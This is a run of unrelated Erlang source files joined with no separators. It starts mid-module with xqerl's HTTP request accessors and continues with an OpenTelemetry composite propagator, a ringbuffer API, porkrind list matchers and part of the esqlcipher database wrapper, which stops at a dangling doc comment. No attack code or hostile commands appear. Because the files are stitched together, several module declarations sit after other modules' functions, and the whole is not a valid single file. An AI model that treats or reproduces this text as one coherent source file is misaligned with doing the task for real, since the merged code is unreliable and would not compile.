%% request:scheme() as xs:string
%% Summary:
%% This function returns the Scheme component of the URI of the HTTP Request.
scheme(#{restxq_ctx := Req}) ->
cowboy_req:scheme(Req);
scheme(_) ->
no_context_error().
%% 3.3.2 request:hostname
%% request:hostname() as xs:string
%% Summary:
%% This function returns the Hostname fragment of the Authority component of
%% the URI of the HTTP Request.
hostname(#{restxq_ctx := Req}) ->
cowboy_req:host(Req);
hostname(_) ->
no_context_error().
%% 3.3.3 request:port
%% request:port() as xs:integer
%% Summary:
%% This function returns the Port fragment of the Authority component of the
%% URI of the HTTP Request. If the port is not explicitly specified in the
%% URI, then the default port for the HTTP Scheme is returned (i.e. 21 for
%% FTP, 80 for HTTP and 443 for HTTPS).
port(#{restxq_ctx := Req}) ->
cowboy_req:port(Req);
port(_) ->
no_context_error().
%% 3.3.4 request:path
%% request:path() as xs:string
%% Summary:
%% This function returns the Path component of the URI of the HTTP Request.
path(#{restxq_ctx := Req}) ->
cowboy_req:path(Req);
path(_) ->
no_context_error().
%% 3.3.5 request:query
%% request:query() as xs:string?
%% Summary:
%% This function returns the Query Component of the HTTP Request URI, if
%% there is no query component then an empty sequence is returned.
%% An empty binary from cowboy_req:qs/1 is translated to [] (the XQuery
%% empty sequence).
query(#{restxq_ctx := Req}) ->
case cowboy_req:qs(Req) of
<<>> -> [];
Qs -> Qs
end;
query(_) ->
no_context_error().
%% 3.3.6 request:uri
%% request:uri() as xs:anyURI
%% Summary:
%% This function returns the URI of the HTTP Request.
%% cowboy_req:uri/1 returns iodata; flatten to a binary and tag as xs:anyURI.
uri(#{restxq_ctx := Req}) ->
?URI(iolist_to_binary(cowboy_req:uri(Req)));
uri(_) ->
no_context_error().
%% 3.4 Connection Functions
%% Functions that deal with the TCP/IP Connection of the HTTP Request.
%% 3.4.1 request:address
%% request:address() as xs:string
%% Summary:
%% This functions returns the IP address of the server.
%% Local socket address from cowboy_req:sock/1, rendered textually by inet:ntoa/1.
address(#{restxq_ctx := Req}) ->
{IpAddress, _} = cowboy_req:sock(Req),
iolist_to_binary(inet:ntoa(IpAddress));
address(_) ->
no_context_error().
%% 3.4.2 request:remote-hostname
%% request:remote-hostname() as xs:string
%% Summary:
%% This functions returns the fully qualified hostname of the client or the
%% last proxy that sent the HTTP Request. If the name of the remote host
%% cannot be established, or an implementation chooses not to establish the
%% remote hostname, this method behaves as request:remote-address(), and
%% returns the IP address.
%% Performs a reverse DNS lookup via inet:gethostbyaddr/1; on failure the
%% textual peer IP is returned instead, as the spec above allows.
remote_hostname(#{restxq_ctx := Req}) ->
{IpAddress, _Port} = cowboy_req:peer(Req),
case inet:gethostbyaddr(IpAddress) of
{ok, Hostent} ->
iolist_to_binary([Hostent#hostent.h_name]);
{error, _} ->
iolist_to_binary(inet:ntoa(IpAddress))
end;
remote_hostname(_) ->
no_context_error().
%% 3.4.3 request:remote-address
%% request:remote-address() as xs:string
%% Summary:
%% This functions returns the IP address of the client or the last proxy that
%% sent the HTTP Request.
remote_address(#{restxq_ctx := Req}) ->
{IpAddress, _Port} = cowboy_req:peer(Req),
iolist_to_binary(inet:ntoa(IpAddress));
remote_address(_) ->
no_context_error().
%% 3.4.4 request:remote-port
%% request:remote-port() as xs:integer
%% Summary:
%% This functions returns the TCP port of the client socket or the last proxy
%% that sent the HTTP Request.
remote_port(#{restxq_ctx := Req}) ->
{_IpAddress, Port} = cowboy_req:peer(Req),
Port;
remote_port(_) ->
no_context_error().
%% 3.5 HTTP Parameter Functions
%% A HTTP Parameter is defined as either a fragment of the query portion of
%% the HTTP Request URI or the parameter from a submitted HTML Form where the
%% HTTP Request has the Internet Media Type "application/x-www-form-urlencoded".
%% 3.5.1 request:parameter-names
%% request:parameter-names() as xs:string*
%% Summary:
%% This function returns a Sequence containing the names of Parameters
%% available from the HTTP Request.
parameter_names(#{restxq_ctx := Req}) ->
ParsedQs = cowboy_req:parse_qs(Req),
[K || {K, _} <- ParsedQs];
parameter_names(_) ->
no_context_error().
%% 3.5.2 request:parameter
%% request:parameter($parameter-name as xs:string) as xs:string*
%% Summary:
%% This function returns a Sequence containing the values of the named HTTP
%% Parameter in the HTTP Request. If there is no such parameter in the HTTP
%% Request, then an empty sequence is returned.
%% A parameter supplied without a value is parsed as the atom 'true' and is
%% normalised to the empty string here. Non-binary names are cast to
%% xs:string before lookup (second clause).
parameter(#{restxq_ctx := Req}, Param) when is_binary(Param) ->
ParsedQs = cowboy_req:parse_qs(Req),
Found = proplists:get_all_values(Param, ParsedQs),
lists:map(
fun
(true) -> <<>>;
(I) -> I
end,
Found
);
parameter(#{restxq_ctx := _} = Ctx, Param) ->
parameter(Ctx, xqerl_types:cast_as(Param, 'xs:string'));
parameter(_, _) ->
no_context_error().
%% request:parameter($parameter-name as xs:string,
%% $default as xs:string) as xs:string
%% Summary:
%% This function returns a Sequence containing the values of the named HTTP
%% Parameter in the HTTP Request. If there is no such parameter in the HTTP
%% Request, then the value specified in $default is returned instead.
%% The default is only used when the parameter is completely absent; an
%% empty value still wins over the default.
parameter(#{restxq_ctx := Req}, Param, Default) when is_binary(Param), is_binary(Default) ->
ParsedQs = cowboy_req:parse_qs(Req),
Found = proplists:get_all_values(Param, ParsedQs),
case Found of
[] ->
Default;
_ ->
lists:map(
fun
(true) -> <<>>;
(I) -> I
end,
Found
)
end;
parameter(#{restxq_ctx := _} = Ctx, Param, Default) ->
parameter(
Ctx,
xqerl_types:cast_as(Param, 'xs:string'),
xqerl_types:cast_as(Default, 'xs:string')
);
parameter(_, _, _) ->
no_context_error().
%% 3.6 HTTP Header Functions
%% 3.6.1 request:header-names
%% request:header-names() as xs:string+
%% Summary:
%% This function returns a Sequence containing the names of the HTTP Headers
%% available from the HTTP Request.
%% cowboy_req:headers/1 returns the request headers as a map of binary
%% names to values; only the keys are returned here.
header_names(#{restxq_ctx := Req}) ->
    %% Renamed from ParsedQs (copy-paste from parameter_names/1): this is
    %% the headers map, not a parsed query string.
    Headers = cowboy_req:headers(Req),
    maps:keys(Headers);
header_names(_) ->
    no_context_error().
%% 3.6.2 request:header
%% request:header($header-name as xs:string) as xs:string?
%% Summary:
%% This function returns the value of the named HTTP Header in the HTTP
%% Request. If there is no such header, then an empty sequence is returned.
%% Header names are lower-cased before lookup; the [] default represents
%% the XQuery empty sequence. Non-binary names are cast to xs:string.
header(#{restxq_ctx := Req}, Name) when is_binary(Name) ->
cowboy_req:header(string:lowercase(Name), Req, []);
header(#{restxq_ctx := _} = Ctx, Name) ->
header(Ctx, xqerl_types:cast_as(Name, 'xs:string'));
header(_, _) ->
no_context_error().
%% request:header($header-name as xs:string, $default as xs:string) as xs:string
%% Summary:
%% This function returns the value of the named HTTP Header in the HTTP
%% Request. If there is no such header, then the value specified in $default
%% is returned instead.
header(#{restxq_ctx := Req}, Name, Default) when is_binary(Name), is_binary(Default) ->
cowboy_req:header(string:lowercase(Name), Req, Default);
header(#{restxq_ctx := _} = Ctx, Name, Default) ->
header(
Ctx,
xqerl_types:cast_as(Name, 'xs:string'),
xqerl_types:cast_as(Default, 'xs:string')
);
header(_, _, _) ->
no_context_error().
%% 3.7 Cookie Functions
%% 3.7.1 request:cookie-names
%% request:cookie-names() as xs:string*
%% Summary:
%% This function returns a Sequence containing the names of the Cookies in
%% the HTTP Headers available from the HTTP Request.
cookie_names(#{restxq_ctx := Req}) ->
ParsedCs = cowboy_req:parse_cookies(Req),
[K || {K, _} <- ParsedCs];
cookie_names(_) ->
no_context_error().
%% 3.7.2 request:cookie
%% request:cookie($cookie-name as xs:string) as xs:string?
%% Summary:
%% This function returns the value of the named Cookie in the HTTP Request.
%% If there is no such cookie, then an empty sequence is returned.
%% A missing cookie yields [] (the XQuery empty sequence); non-binary names
%% are cast to xs:string before lookup.
cookie(#{restxq_ctx := Req}, Name) when is_binary(Name) ->
ParsedCs = cowboy_req:parse_cookies(Req),
case lists:keyfind(Name, 1, ParsedCs) of
{_, Token} -> Token;
_ -> []
end;
cookie(#{restxq_ctx := _} = Ctx, Name) ->
cookie(Ctx, xqerl_types:cast_as(Name, 'xs:string'));
cookie(_, _) ->
no_context_error().
%% request:cookie($cookie-name as xs:string, $default as xs:string) as xs:string
%% Summary:
%% This function returns the value of the named Cookie in the HTTP Request.
%% If there is no such cookie, then the value specified in $default is
%% returned instead.
cookie(#{restxq_ctx := Req}, Name, Default) when is_binary(Name), is_binary(Default) ->
ParsedCs = cowboy_req:parse_cookies(Req),
case lists:keyfind(Name, 1, ParsedCs) of
{_, Token} -> Token;
_ -> Default
end;
cookie(#{restxq_ctx := _} = Ctx, Name, Default) ->
cookie(
Ctx,
xqerl_types:cast_as(Name, 'xs:string'),
xqerl_types:cast_as(Default, 'xs:string')
);
cookie(_, _, _) ->
no_context_error().
-define(Q(V), #xqAtomicValue{
type = 'xs:QName',
value = #qname{
namespace = ?ERRNS,
prefix = ?ERRPX,
local_name = V
}
}).
%% @doc Throws the EXQuery request error reqerr:REDY0001. Raised by every
%% function in this module when it is called outside of an HTTP (RESTXQ)
%% context, i.e. when the context map carries no restxq_ctx key.
%% (Removed trailing non-code residue that followed throw(E).)
no_context_error() ->
    E = #xqError{
        description = <<"Not in an HTTP context.">>,
        name = ?Q(<<"REDY0001">>)
    },
    throw(E).
%%%------------------------------------------------------------------------
%% Copyright 2020, OpenTelemetry Authors
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%%
%% @doc A Composite TextMap Propagator is a Propagator that performs run
%% multiple TextMap Propagators in a specified order.
%%
%% An example of creating a Composite TextMap Propagator to inject and
%% extract Baggage and TraceContext:
%%
%% ```
%% Propagator = otel_propagator_text_map_composite:create([trace_context, baggage]),
%% otel_propagator_text_map:extract(Propagator, Carrier)
%% '''
%% @end
%%%-------------------------------------------------------------------------
-module(otel_propagator_text_map_composite).
-behaviour(otel_propagator_text_map).
-export([create/1,
fields/1,
inject/4,
extract/5,
report_cb/1]).
-include_lib("kernel/include/logger.hrl").
%% @doc Builds a composite propagator: a {?MODULE, Propagators} tuple with
%% any builtin aliases resolved to their module names.
create(Propagators) ->
{?MODULE, otel_propagator:builtins_to_modules(Propagators)}.
%% @doc Union of the carrier field names of all member propagators
%% (concatenated in propagator order, duplicates not removed).
fields(Propagators) ->
lists:flatmap(fun(Propagator) ->
otel_propagator_text_map:fields(Propagator)
end, Propagators).
%% Runs every injector, in order, threading the carrier through each one.
-spec inject(Context, Carrier, CarrierSetFun, Injectors) -> Carrier
when Context :: otel_ctx:t(),
Carrier :: otel_propagator:carrier(),
CarrierSetFun :: otel_propagator_text_map:carrier_set(),
Injectors :: [otel_propagator_text_map:t()].
inject(Context, Carrier, CarrierSetFun, Injectors) ->
run_injectors(Context, Injectors, Carrier, CarrierSetFun).
%% Runs every extractor, in order, threading the context through each one.
-spec extract(Context, Carrier, CarrierKeysFun, CarrierGetFun, Extractors) -> Context
when Context :: otel_ctx:t(),
Carrier :: otel_propagator:carrier(),
CarrierKeysFun :: otel_propagator_text_map:carrier_keys(),
CarrierGetFun :: otel_propagator_text_map:carrier_get(),
Extractors :: [otel_propagator_text_map:t()].
extract(Context, Carrier, CarrierKeysFun, CarrierGetFun, Extractors) ->
run_extractors(Context, Extractors, Carrier, CarrierKeysFun, CarrierGetFun).
%% Folds the extractors over the context. An exception raised by one
%% propagator is caught, logged at info level (formatted by report_cb/1),
%% and the context from before that propagator is kept, so a single
%% failing propagator does not abort the rest of the chain.
run_extractors(Context, Extractors, Carrier, CarrierKeysFun, CarrierGetFun) when is_list(Extractors) ->
lists:foldl(fun(Propagator, ContextAcc) ->
try otel_propagator_text_map:extract_to(ContextAcc, Propagator, Carrier, CarrierKeysFun, CarrierGetFun)
catch
C:E:S ->
?LOG_INFO(#{extractor => Propagator, carrier => Carrier,
class => C, exception => E, stacktrace => S},
#{report_cb => fun ?MODULE:report_cb/1}),
ContextAcc
end
end, Context, otel_propagator:builtins_to_modules(Extractors)).
%% Folds the injectors over the carrier; same error-isolation strategy as
%% run_extractors/5 (log and continue with the previous carrier).
run_injectors(Context, Injectors, Carrier, Setter) when is_list(Injectors) ->
lists:foldl(fun(Propagator, CarrierAcc) ->
try otel_propagator_text_map:inject_from(Context, Propagator, CarrierAcc, Setter)
catch
C:E:S ->
?LOG_INFO(#{injector => Propagator, carrier => CarrierAcc,
class => C, exception => E, stacktrace => S},
#{report_cb => fun ?MODULE:report_cb/1}),
CarrierAcc
end
end, Carrier, otel_propagator:builtins_to_modules(Injectors)).
%% @doc Logger report callback that formats the failure maps produced in
%% run_extractors/5 and run_injectors/4 into a readable message. The
%% carrier is matched but not included in the output message.
%% (Removed trailing non-code residue after the final clause.)
report_cb(#{extractor := Propagator, carrier := _Carrier,
            class := Class, exception := Exception, stacktrace := StackTrace}) ->
    {"text map propagator failed to extract from carrier: propagator=~ts exception=~ts",
     [Propagator, otel_utils:format_exception(Class, Exception, StackTrace)]};
report_cb(#{injector := Propagator, carrier := _Carrier,
            class := Class, exception := Exception, stacktrace := StackTrace}) ->
    {"text map propagator failed to inject to carrier: propagator=~ts exception=~ts",
     [Propagator, otel_utils:format_exception(Class, Exception, StackTrace)]}.
%% @author <NAME> <<EMAIL>>
%% @copyright 2021 <NAME>
%% @doc Ringbuffer implements a length limited queue. In systems this is
%% often implemented as a ring, or cylic, buffer. Where the writer can
%% push the reader ahead if the buffer is full.
%%
%% This kind of buffers is useful in situations where you can have
%% surges of writers, with a limited amount of readers. And where it
%% is allowed to drop entries from the queue if the readers can't keep
%% up with the writers.
%%
%% An example is a logging system for a http server, which can handle large
%% bursts of requests. The logger is often limited in its throughput, and it
%% is perfectly ok to drop log entries if that means that the server can
%% handle the peak load.
%%
%% This ring buffer is technically not a ring. It is a size limited buffer,
%% implemented in ets. Its main characteristics are:
%%
%% <ul>
%% <li>Optimized for writes: non locking and non blocking queue writes;</li>
%% <li>Size limited, define the maximum number of entries upon queue creation;</li>
%% <li>Readers are synchronized to prevent race conditions;</li>
%% <li>Readers return the number of entries that were lost due to too
%% fast writers;</li>
%% <li>As many queues as needed.</li>
%% </ul>
%%
%% Copyright 2021 <NAME>
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
-module(ringbuffer).
-export([
start/0,
new/2,
delete/1,
write/2,
read/1
]).
-type ringbuffer() :: term().
-export_type([ringbuffer/0]).
%% Start the ringbuffer application
%% @doc Starts the ringbuffer OTP application (and its supervisor tree).
start() ->
application:start(ringbuffer).
%% @doc Create a new named buffer of Size entries. The name must be unique for all ets tables.
%% The name must be an atom, and is used for the name of the ets table. A process owning the
%% ets table and synchronizing the readers is added to <tt>ringbuffer_sup</tt>.
-spec new( Name :: atom(), Size :: pos_integer() ) -> {ok, pid()} | {error, term()}.
new( Name, Size ) ->
ringbuffer_sup:start_child(Name, Size).
%% @doc Delete a named ringbuffer, all queued data is destroyed. The ets table and the
%% synchronizing process are deleted.
-spec delete( Name :: atom() ) -> ok | {error, not_found}.
delete(Name) ->
ringbuffer_sup:stop_child(Name).
%% @doc Add an entry to the named ringbuffer. Never fails, if the ringbuffer
%% is full then older entries are overwritten.
-spec write( Name :: atom(), Payload :: term() ) -> ok.
write(Name, Payload) ->
ringbuffer_process:write(Name, Payload).
%% @doc Read the next entry from the named ringbuffer. Return the number of skipped entries and
%% the payload of the entry read. An entry is skipped if the readers are falling behind the
%% writers by more than the size of the buffer. <tt>{error, empty}</tt> is returned if the
%% buffer is empty.
-spec read( Name :: atom() ) -> {ok, {non_neg_integer(), term()}} | {error, empty}.
read(Name) ->
    ringbuffer_process:read(Name).
% Licensed under the Apache License, Version 2.0 (the "License"); you may not
% use this file except in compliance with the License. You may obtain a copy of
% the License at
%
% http://www.apache.org/licenses/LICENSE-2.0
%
% Unless required by applicable law or agreed to in writing, software
% distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
% WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
% License for the specific language governing permissions and limitations under
% the License.
-module(porkrind_lists).
-include("porkrind_internal.hrl").
-export([
has_item/1,
has_items/1,
empty/0
]).
%% Matcher asserting that at least one item of a list satisfies Matcher0.
%% Composed with porkrind_types:is_list/0 via all_of/1 so the inner match
%% fun is only applied to lists.
has_item(Matcher0) ->
Matcher = porkrind_util:maybe_wrap(Matcher0),
M = #'porkrind.matcher'{
name = has_item,
args = [Matcher0],
match = fun(Values) ->
case has_item_int(Values, Matcher) of
ok ->
ok;
nomatch ->
?PR_FAIL({no_match, Values})
end
end,
reason = fun({no_match, Values}) ->
Prefix = io_lib:format("~w has no item matching ", [Values]),
[Prefix, porkrind:describe(Matcher)]
end
},
porkrind_logic:all_of([
porkrind_types:is_list(),
M
]).
%% Linear scan: returns ok on the first element accepted by the matcher,
%% nomatch when the list is exhausted.
has_item_int([], _Matcher) ->
nomatch;
has_item_int([Value | Rest], Matcher) ->
case porkrind:check(Value, Matcher) of
ok ->
ok;
{assertion_failed, _} ->
has_item_int(Rest, Matcher)
end.
%% Matcher asserting that, for every matcher in Matchers0, some (possibly
%% different) item of the list satisfies it. Fails on the first matcher
%% with no matching item.
has_items(Matchers0) ->
Matchers = lists:map(fun porkrind_util:maybe_wrap/1, Matchers0),
M = #'porkrind.matcher'{
name = has_items,
args = [Matchers0],
match = fun(Values) ->
lists:foreach(fun(Matcher) ->
case has_item_int(Values, Matcher) of
ok ->
ok;
nomatch ->
?PR_FAIL({nomatch, Values, Matcher})
end
end, Matchers)
end,
reason = fun({nomatch, Values, Matcher}) ->
Prefix = io_lib:format("~w has no item matching ", [Values]),
[Prefix, porkrind:describe(Matcher)]
end
},
porkrind_logic:all_of([
porkrind_types:is_list(),
M
]).
%% Matcher asserting that a value is the empty list. Composed with
%% porkrind_types:is_list/0 via all_of/1.
empty() ->
    M = #'porkrind.matcher'{
        name = empty,
        args = [],
        %% Pattern match on [] rather than `length(Value) == 0`: length/1
        %% walks the whole list (O(n)) while the emptiness test only needs
        %% to look at the first cons cell.
        match = fun
            ([]) -> ok;
            (Value) -> ?PR_FAIL({notempty, Value})
        end,
        reason = fun({notempty, Value}) ->
            io_lib:format("~p is not an empty list", [Value])
        end
    },
    porkrind_logic:all_of([
        porkrind_types:is_list(),
        M
    ]).
%% @author <NAME> <<EMAIL>>
%% @author <NAME> <<EMAIL>>
%% @copyright 2011 - 2021 <NAME>, <NAME>
%% @version 2.0.0-rc.3
%% @doc Erlang API for sqlite3 and sqlcipher databases.
%% This is an adaptation of Maas-Maarten Zeeman's esqlite package for
%% <a href="https://www.zetetic.net/sqlcipher/">sqlcipher</a> encrypted sqlite3
%% databases.
%%
%% All functions (except {@link is_encrypted/1}) take an optional `Timeout'
%% argument. The default value for this timeout is 5 seconds (`5000').
%% Note that <b>`Timeout' is merely a lower bound</b>. Several functions call
%% multiple lower level calls, in which case <i>each</i> of those has is given
%% that timeout. Thus, the actual timeout might be several times the value
%% of `Timeout' for some functions.
%%
%% To open or create a database, use either {@link open/2} or
%% {@link open_encrypted/3}. These return a database connection that can be used
%% in the other functions and should be closed afterwards using {@link close/2}.
%%
%% == Queries ==
%% One-off queries that do not return anything can be executed using
%% {@link exec/3}, {@link exec/4} (with {@section Query Parameters}), or
%% {@link insert/3} (which returns the row id of the row inserted last).
%%
%% In most cases, however, you'll want to use <i>prepared statemtents</i> that
%% can contain {@section Query Parameters}. These statements are created using
%% {@link prepare/3}. If it contains parameters, you can then bind values to
%% those using {@link bind/3} (you can do both in one step using
%% {@link prepare_bind/4}. Afterwards, you can run the statement using
%% {@link run/2} (if you don't care about any rows that are possibly returned),
%% or the `fetch' family ({@link fetch_one/2}, {@link fetch_chunk/3},
%% {@link fetch_all/3}). You can use {@link column_names/2} and
%% {@link column_types/2} on a prepared statement to get the actual names and
%% types of the columns that will be returned by it. Using {@link reset/3}, the
%% prepared statement's initial state will be restored and you can run it once
%% more.
%%
%% Additionally, there is the {@link q/4} and the {@link foreach/5} and
%% {@link map/5} higher-order functions. These do not return {ok, _} or
%% {error, _} tuples; if errors occur, they are thrown.
%%
%% === Query Parameters ===
%% SQLite statements can have parameters that values can be bound to. They take
%% the following forms
%% <ul>
%% <li>`?': Unnamed/anonymous parameters,</li>
%% <li>`?NNN', where `NNN' is a positive integer: Numbered parameters, and</li>
%% <li>`:AAA', where `AAA' is an alphanumeric identifier. <small><i>(sqlite's
%% `@AAA' and `$AAA' forms are also supported but discouraged).</i></small></li>
%% </ul>
%% Prefer numbered or named over anonymous parameters and <b>do not mix named
%% and numbered parameters!</b> See {@link bind/3} for further details!
%%
%% The following <a href="https://www.sqlite.org/datatype3.html">data types</a>
%% are supported by sqlite3:
%% <ul>
%% <li>`INTEGER': for these, just use regular Erlang integers</li>
%% <li>`REAL': Erlang floats</li>
%% <li>`TEXT': Only utf-8 encoded binaries, not strings/charlists should be used
%% for these! iolists are allowed.</li>
%% <li>`BLOB': Any binary can be stored exactly as is into a blob. The can be
%% passed as ``{'$blob', <<"binary data">>}''.</li>
%% <li>`NULL': These are translated to the atom `nil'.</li>
%% </ul>
%% Note that sqlite3 does not have a boolean data type. Use integers.
%% Values are translated between Erlang and sqlite3 data types when `bind'ing or
%% `fetch'ing. Trying to `bind' any other types, such as atoms or booleans, will
%% result in an error.
%% Copyright 2011 - 2021 <NAME>, <NAME>
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
-module(esqlcipher).
-author("<NAME> <<EMAIL>>").
-author("<NAME> <<EMAIL>>").
%% higher-level export
-export([open/1, open/2,
open_encrypted/2, open_encrypted/3,
close/1, close/2,
is_encrypted/1,
rekey/2, rekey/3,
exec/2, exec/3, exec/4,
insert/2, insert/3,
prepare/2, prepare/3,
bind/2, bind/3,
prepare_bind/3, prepare_bind/4,
reset/1, reset/2, reset/3,
run/1, run/2,
fetch_one/1, fetch_one/2,
fetch_chunk/2, fetch_chunk/3,
fetch_all/1, fetch_all/2, fetch_all/3,
changes/1, changes/2,
column_names/1, column_names/2,
column_types/1, column_types/2,
get_autocommit/1, get_autocommit/2,
set_update_hook/2, set_update_hook/3,
q/2, q/3, q/4,
map/3, map/4, map/5,
foreach/3, foreach/4, foreach/5
]).
-define(DEFAULT_TIMEOUT, 5000).
-define(DEFAULT_CHUNK_SIZE, 5000).
%% How many times to retry fetching from a busy database. 0 = fail immediately when busy
-define(MAX_TRIES, 5).
-type connection() :: {connection, reference(), plaintext | encrypted}.
%% Database connection type.
%% Returned by {@link open/2} and {@link open_encrypted/3}.
-type connection_plain() :: {connection, reference(), plaintext}.
%% Unencrypted database connection type.
-type connection_enc() :: {connection, reference(), encrypted}.
%% Encrypted database connection type.
-type statement() :: {statement, reference(), connection()}.
%% Prepared statement type.
%% Returned by {@link prepare/3} or {@link prepare_bind/4}.
-type sqlite_error() :: {error, {atom(), string()}}.
%% Error return type.
%% Contains an error id atom and a reason/error message.
-type sql() :: iodata().
%% SQL string type.
-type sql_value() :: number() | nil | iodata() | {'$blob', iodata()}.
%% SQL value type.
-type bind_value() :: sql_value() | {pos_integer() | atom(), sql_value()}.
%% List of values for statement parameters (see {@link bind/3}).
-type row() :: [sql_value()].
%% SQL row type.
-type map_function(ReturnType) :: fun((Row :: row()) -> ReturnType) | fun((ColNames :: [binary()], Row :: row()) -> ReturnType).
%% Type of functions used in {@link map/5}.
-type foreach_function() :: fun((Row :: row()) -> any()) | fun((ColNames :: [binary()], Row :: row()) -> any()).
%% Type of functions used in {@link foreach/5}.
%% @equiv open(Filename, 5000)
-spec open(iodata()) -> {ok, connection_plain()} | sqlite_error().
open(Filename) ->
open(Filename, ?DEFAULT_TIMEOUT).
%% @doc Open an unencrypted database connection.
%% If `Filename' doesn't exist, it will be created. You can also open an
%% in-memory database that will be destroyed after closing by giving `:memory:'
%% as the Filename. <a href="https://www.sqlite.org/uri.html">URI filenames</a>
%% are allowed as well.
%%
%% The database will be checked by testing whether `sqlite_master' is readable.
%% Unreadable, corrupted or encrypted databases will return an error of the form
%% `{error, {baddb, _}}'.
%%
%% Since sqlcipher is just sqlite3 under the hood, these unencrypted databases
%% are fully compatible with sqlite3.
-spec open(iodata(), timeout()) -> {ok, connection_plain()} | sqlite_error().
open(Filename, Timeout) ->
{ok, Connection} = esqlcipher_nif:start(),
Ref = make_ref(),
ok = esqlcipher_nif:open(Connection, Ref, self(), Filename),
case receive_answer(Ref, Timeout) of
ok ->
Conn = {connection, Connection, plaintext},
%% Probe sqlite_master to detect encrypted/corrupt files; on failure
%% the connection is closed before returning the baddb error.
case exec("SELECT * FROM main.sqlite_master LIMIT 0;", Conn, Timeout) of
{error, _} ->
ok = close(Conn),
{error, {baddb, "file is encrypted or not a valid database"}};
ok ->
{ok, Conn}
end;
{error, _Msg} = Error ->
Error
end.
%% @equiv open_encrypted(Filename, Key, 5000)
-spec open_encrypted(iodata(), iodata()) -> {ok, connection_enc()} | sqlite_error().
open_encrypted(Filename, Key) ->
open_encrypted(Filename, Key, ?DEFAULT_TIMEOUT).
%% @doc Open an encrypted database connection.
%% If `Filename' doesn't exist, it will be created.
%%
%% The database will be checked by testing whether `sqlite_master' is readable.
%% Unreadable or corrupted databases as well as an incorrect `Key' will
%% return an error of the form `{error, {baddb, _}}'.
%%
%% Normally, the actual database key will be derived from `Key' using PBKDF2
%% key derivation by sqlcipher. However, it's possible to specify a raw byte
%% sequence as a key. This key has to be hex-encoded and can be used by passing
%% ``"x'<KEY>'"'' using a 64 character hex string for a resulting
%% 32 byte key (256 bits). Finally, an exact database salt can be specified as
%% well by passing a 96 character hex string (the last 32 characters will be
%% used as the salt). If the salt is not explicitly provided, it will be
%% generated randomly and stored in the first 16 bytes of the database.
%%
%% Please refer to the
%% <a href="https://www.zetetic.net/sqlcipher/sqlcipher-api/#key">sqlcipher
%% documentation</a> for further information about the generation and usage of
%% encryption keys.
-spec open_encrypted(iodata(), iodata(), timeout()) -> {ok, connection_enc()} | sqlite_error().
open_encrypted(Filename, Key, Timeout) ->
{ok, Connection} = esqlcipher_nif:start(),
Ref = make_ref(),
ok = esqlcipher_nif:open(Connection, Ref, self(), Filename),
case receive_answer(Ref, Timeout) of
ok ->
Conn = {connection, Connection, encrypted},
%% key/3 both applies the key and validates it; on failure the
%% connection is closed before the error is returned.
case key(Key, Conn, Timeout) of
{error, _} = Error ->
ok = close(Conn),
Error;
ok ->
{ok, Conn}
end;
{error, _Msg} = Error ->
Error
end.
%% @equiv close(Connection, 5000)
-spec close(connection()) -> ok | sqlite_error().
close(Connection) ->
close(Connection, ?DEFAULT_TIMEOUT).
%% @doc Close the database connection.
-spec close(Connection :: connection(), timeout()) -> ok | sqlite_error().
close({connection, Connection, _}, Timeout) ->
Ref = make_ref(),
ok = esqlcipher_nif:close(Connection, Ref, self()),
receive_answer(Ref, Timeout).
%% @doc Whether a database is encrypted.
%% Returns true when the connection tuple is tagged encrypted, false when
%% it is tagged plaintext (see open/2 vs open_encrypted/3).
-spec is_encrypted(Connection :: connection()) -> boolean().
is_encrypted({connection, _Ref, Kind}) ->
    case Kind of
        encrypted -> true;
        plaintext -> false
    end.
%% @doc Unlock database and test whether the key is correct.
%% Must be called before the database is written to.
%% Applies the key via the NIF, then probes sqlite_master: with a wrong key
%% the probe fails with a notadb error, which is rewritten to baddb.
%% @private
-spec key(iodata(), connection(), timeout()) -> ok | sqlite_error().
key(Key, {connection, Conn, encrypted}=Connection, Timeout) ->
    Ref = make_ref(),
    ok = esqlcipher_nif:key(Conn, Ref, self(), Key),
    case receive_answer(Ref, Timeout) of
        ok ->
            % Test whether the given key was correct. If not, this will give an error
            case exec("SELECT * FROM main.sqlite_master LIMIT 0;", Connection, Timeout) of
                {error, {notadb, _}} ->
                    {error, {baddb, "invalid key or file is not a valid database"}};
                {error, _} = Error ->
                    Error;
                ok -> ok
            end;
        %% Previously `{error, _} -> error`, which dropped the reason and
        %% returned the bare atom 'error', violating the -spec above
        %% (callers expect ok | {error, {atom(), string()}}).
        {error, _Reason} = Error -> Error
    end.
%% @equiv rekey(Key, Connection, 5000)
-spec rekey(iodata(), connection()) -> ok | sqlite_error().
rekey(Key, Connection) ->
    rekey(Key, Connection, ?DEFAULT_TIMEOUT).
%% @doc Change the database key.
%% This function cannot be used to encrypt an unencrypted database and will
%% return an error `{error, {rekey_plaintext, _}}' if called on one.
%%
%% @see open_encrypted/3
-spec rekey(iodata(), Connection :: connection(), timeout()) -> ok | sqlite_error().
%% Plaintext connections are rejected up-front by pattern match.
rekey(_, {connection, _, plaintext}, _Timeout) ->
    {error, {rekey_plaintext, "cannot rekey an unencrypted database"}};
rekey(Key, {connection, Conn, encrypted}, Timeout) ->
    Ref = make_ref(),
    ok = esqlcipher_nif:rekey(Conn, Ref, self(), Key),
    receive_answer(Ref, Timeout).
%% @equiv set_update_hook(Pid, Connection, 5000)
